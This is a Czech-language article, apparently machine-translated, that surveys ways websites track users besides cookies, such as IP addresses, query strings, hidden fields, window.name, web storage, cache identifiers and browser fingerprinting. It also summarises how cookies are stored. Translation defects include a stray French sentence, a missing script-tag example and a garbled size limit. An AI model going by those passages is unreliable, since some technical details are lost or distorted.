Některé operace, které lze provádět pomocí souborů cookie, lze také provádět pomocí jiných mechanismů, které obcházejí soubory cookie nebo znovu vytvářejí smazané soubory cookie, což vytváří problémy s ochranou soukromí stejným způsobem (nebo někdy horším, protože pak jsou neviditelné) než soubory cookie.

IP adresa

Uživatelé mohou být sledováni pomocí IP adresy počítače, který stránku volá. Tato technika je k dispozici od zavedení World Wide Web, když se stránky stahují, server požaduje IP adresu počítače, na kterém běží prohlížeč nebo proxy, pokud se žádná nepoužívá. Server může tyto informace sledovat, zda jsou či nejsou používány soubory cookie. Tyto adresy jsou však při identifikaci uživatele obvykle méně spolehlivé než soubory cookie, protože počítače a servery proxy mohou sdílet více uživatelů a stejný počítač může při každé pracovní relaci obdržet jinou adresu IP (jako je tomu často u telefonních připojení). .

Sledování podle IP adres může být v některých situacích spolehlivé, jako jsou širokopásmová připojení, která si udržují stejnou IP adresu po dlouhou dobu, dokud je zapnuto napájení.

Některé systémy jako Tor jsou navrženy tak, aby zachovaly anonymitu internetu a znemožňovaly nebo znemožňovaly sledování podle IP adresy.

URL

Přesnější technika je založena na vkládání informací do adres URL. Část adresy URL s řetězcem dotazu je jednou z technik, která se pro tento účel obvykle používá, lze však použít i jiné části. Jak Java serverlet, tak mechanismy relace PHP používají tuto metodu, pokud nejsou povoleny soubory cookie.

Tato metoda spočívá v tom, že webový server připojí požadavky na řetězec k odkazům webové stránky, která jej přenáší, když je odeslána do prohlížeče. Když uživatel následuje odkaz, prohlížeč vrátí serveru připojený řetězec dotazu.

Řetězce dotazů používané pro tento účel a soubory cookie jsou velmi podobné, obě jsou informacemi libovolně vybranými serverem a vrácenými prohlížečem. Existují však určité rozdíly: když je znovu použita adresa URL obsahující řetězec dotazu, jsou na server odeslány stejné informace. Pokud jsou například předvolby uživatele zakódovány v řetězci dotazu adresy URL a uživatel tuto adresu URL odešle jinému uživateli prostřednictvím e-mailu, bude moci tyto předvolby použít i tento uživatel.

Na druhou stranu, když uživatel přistupuje na stejnou stránku dvakrát, není zaručeno, že bude pokaždé použit stejný řetězec dotazu. Pokud se například uživatel poprvé dostane na stránku z interní stránky webu a podruhé se dostane na stejnou stránku z externí stránky, řetězec dotazu vzhledem ke stránce webu je obvykle jiný, zatímco soubory cookie jsou stejné. .

Další nevýhody řetězců dotazů souvisejí se zabezpečením: uchovávání dat, která identifikují relaci v řetězcích dotazů, umožňuje nebo zjednodušuje útoky na fixaci relací, útoky na odkazy na identifikátory a další zneužití. Předávání ID relací jako HTTP cookie je bezpečnější.

Skryté pole formuláře

Jednou z forem sledování relace, kterou používá ASP.NET, je použití webových formulářů se skrytými poli. Tato technika je velmi podobná použití řetězců dotazů URL k přenosu informací a má stejné výhody a nevýhody; a pokud je formulář zpracován metodou HTTP GET, pole se ve skutečnosti stanou součástí URL prohlížeče, který jej odešle při odesílání formuláře. Většina formulářů se však zpracovává pomocí HTTP POST, což způsobí, že informace o formuláři, včetně skrytých polí, budou přidány jako další vstup, který není součástí adresy URL ani souboru cookie.

Tento přístup má z pohledu sledování dvě výhody: za prvé, sledování informací umístěných ve zdrojovém kódu HTML a vstupu POST namísto adresy URL umožní průměrnému uživateli vyhnout se tomuto sledování; za druhé, informace o relaci se nezkopírují, když uživatel zkopíruje URL (například za účelem uložení stránky na disk nebo odeslání e-mailem).

jméno.okna

Všechny běžné webové prohlížeče mohou ukládat poměrně velké množství dat (2 MB až 32 MB) prostřednictvím JavaScriptu pomocí vlastnosti window.name modelu DOM. Tato data lze použít místo souborů cookie relace a používají se také napříč doménami. Techniku ​​lze spojit s objekty JSON pro uložení komplexní sady proměnných relace na straně klienta.

Nevýhodou je, že každé samostatné okno nebo karta bude mít zpočátku prázdné window.name; při procházení po kartách (otevřených uživatelem) to znamená, že jednotlivě otevřené karty nebudou mít název okna. Kromě toho lze window.name použít ke sledování návštěvníků na různých stránkách, což může představovat problém s ochranou soukromí.

V některých ohledech to může být bezpečnější než soubory cookie, protože server není zapojen, takže je nezranitelný vůči síťovému útoku souborů cookie sniffer. Pokud jsou však přijata zvláštní opatření k ochraně dat, jsou zranitelná vůči dalším útokům, protože data jsou dostupná na jiných stránkách otevřených ve stejném okně.

HTTP ověřování

Protokol HTTP zahrnuje základní protokoly ověřování přístupu a výtah ověřování přístupu, který umožňuje přístup na webovou stránku pouze tehdy, když uživatel zadal uživatelské jméno a heslo. Pokud server požaduje certifikát pro udělení přístupu k webové stránce, prohlížeč si jej vyžádá od uživatele a jakmile jej získá, prohlížeč jej uloží a odešle ve všech následujících požadavcích HTTP. Tyto informace lze použít ke sledování uživatele.

Místní sdílený objekt

Pokud prohlížeč obsahuje plugin Adobe Flash Player, místní sdílené objekty lze použít ke stejnému účelu jako soubory cookie. Mohou být atraktivní volbou pro webové vývojáře, protože:

  • výchozí limit velikosti pro místní sdílený objekt je 100 kB;
  • bezpečnostní kontroly jsou oddělené od uživatelských kontrol cookies (takže místní sdílené objekty mohou být povoleny, když cookies nejsou).

Tento poslední bod, který odlišuje zásady správy souborů cookie od zásad místních sdílených objektů Adobe vyvolává otázky týkající se správy jeho nastavení soukromí uživatelem: musí si být vědom, že jeho správa cookies nemá žádný vliv na správu místních sdílených objektů a naopak.

Další kritikou tohoto systému je, že jej lze používat pouze prostřednictvím pluginu Adobe Flash Player, který je proprietární a nejedná se o webový standard.

Perzistence na straně klienta

Některé webové prohlížeče podporují mechanismus perzistence založený na skriptech, který umožňuje stránce ukládat informace lokálně pro pozdější použití. Internet Explorer například podporuje trvalé informace v historii prohlížeče, záložkách, ve formátu uloženém v XML nebo přímo s webovou stránkou uloženou na disku. Pro Microsoft Internet Explorer 5 je k dispozici metoda uživatelských dat prostřednictvím chování DHTML.

W3C představilo v HTML 5 nové JavaScript API pro ukládání dat na straně klienta nazvané Web storage a jeho cílem bylo trvale nahradit soubory cookie. Je podobný souborům cookie, ale s výrazně vylepšenou kapacitou a bez ukládání informací do hlavičky požadavků HTTP. Rozhraní API umožňuje dva typy webového úložiště: localstorage a sessionstorage, podobné trvalým souborům cookie a souborům cookie relací (kromě toho, že platnost souborů cookie relace vyprší, když je prohlížeč zavřen během úložiště relací vyprší při zavření záložky), resp. Webové úložiště podporují Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 a Opera 10.50.

Jiný mechanismus obvykle spoléhá na ukládání do mezipaměti prohlížeče (spíše než obnovování paměti) pomocí programů JavaScript na webových stránkách. 

Stránka může například obsahovat značku . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

V tomto okamžiku zůstává program v mezipaměti a navštívená stránka se podruhé nenačte. Pokud tedy program obsahuje globální proměnnou (například var id = 3243242;), zůstává tento identifikátor platný a může být zneužit jiným kódem JavaScriptu po opětovném načtení stránky nebo po načtení stránky odkazující na program. 

Hlavní nevýhodou této metody je, že globální proměnná JavaScriptu musí být statická, což znamená, že ji nelze změnit ani smazat jako soubor cookie.

otisk prstu webového prohlížeče

Otisk prohlížeče je informace shromážděná o nastavení konfigurace prohlížeče pro účely identifikace. Tyto otisky lze použít k úplné nebo částečné identifikaci uživatele internetu nebo zařízení, i když jsou soubory cookie zakázány.

Základní informace o konfiguraci webového prohlížeče již dlouho shromažďují služby pro publikum na webových stránkách za účelem přesného měření návštěvnosti lidského webu a odhalování různých forem podvodných kliknutí. S pomocí skriptovacích jazyků na straně klienta je shromažďování informací mnohem přesnější nyní možné.

Převedením této informace na bitový řetězec vznikne otisk zařízení. V roce 2010 Electronic Frontier Foundation (EFF) naměřila entropii otisku prstu prohlížeče nejméně 18,1 bitůa to bylo předtím, než pokroky v otisku prstů na plátně přidaly k této entropii 5,7 bitů.

Sušenky v kostce

Cookies jsou malé textové soubory, které webový prohlížeč ukládá na pevný disk návštěvníka webové stránky a které se používají (mimo jiné) k zaznamenávání informací o návštěvníkovi nebo jeho cestě webem. Webmaster tak může rozpoznat zvyky návštěvníka a personalizovat prezentaci jeho stránek pro každého návštěvníka; soubory cookie pak umožňují zapamatovat si, kolik článků zobrazit na domovské stránce nebo dokonce zachovat přihlašovací údaje pro jakoukoli soukromou stranu: když se návštěvník vrátí na stránku, již není nutné, aby zadával své jméno a heslo být rozpoznány, protože jsou automaticky čteny v cookie.

Soubor cookie má omezenou životnost, kterou nastavil návrhář webu. Mohou také vypršet na konci relace na webu, což odpovídá uzavření prohlížeče. Soubory cookie jsou široce používány, aby návštěvníkům usnadnily život a poskytly jim relevantnější informace. Speciální techniky však umožňují sledovat návštěvníka na několika stránkách, a tak sbírat a křížově kontrolovat velmi rozsáhlé informace o jeho zvycích. Tento způsob dal používání cookies pověst sledovací techniky, která narušuje soukromí návštěvníků, což bohužel v mnoha případech použití z netechnických důvodů nebo nerespektujících očekávání uživatelů odpovídá realitě.

V reakci na tyto oprávněné obavy zavádí HTML 5 nové JavaScript API pro ukládání dat na straně klienta s názvem Web storage, které je mnohem bezpečnější a s větší kapacitou, jehož cílem je nahradit soubory cookie.

Ukládání cookies

U některých prohlížečů je soubor cookie snadno upravitelný, k ruční změně jeho hodnot stačí jednoduchý textový editor, jako je Poznámkový blok.

Cookies se ukládají různě v závislosti na prohlížeči:

  • Microsoft Internet Explorer ukládá každý soubor cookie do jiného souboru;
  • Mozilla Firefox ukládá všechny své soubory cookie do jednoho souboru;
  • Opera ukládá všechny své cookies do jednoho souboru a zašifruje je (nelze je upravit s výjimkou softwarových možností);
  • Apple Safari ukládá všechny své soubory cookie do jediného souboru s příponou .plist. Úprava je možná, ale není příliš snadná, pokud neprojdete možnostmi softwaru.

Prohlížeče musí podporovat minimum :

  • 300 souběžných souborů cookie;
  • 4 o za soubor cookie;
  • 20 souborů cookie na hostitele nebo doménu.
[Celkový: 0 Znamenat: 0]

Napsáno Recenze editorů

Tým odborných redaktorů tráví čas zkoumáním produktů, prováděním praktických testů, pohovorem s odborníky z oboru, recenzemi recenzí od spotřebitelů a psaním všech našich výsledků do srozumitelných a komplexních shrnutí.

Zanechat komentář

Vaše e-mailová adresa nebude zveřejněna. Povinné položky jsou označeny *

Co si myslíte?

384 Body
Upvote Dolů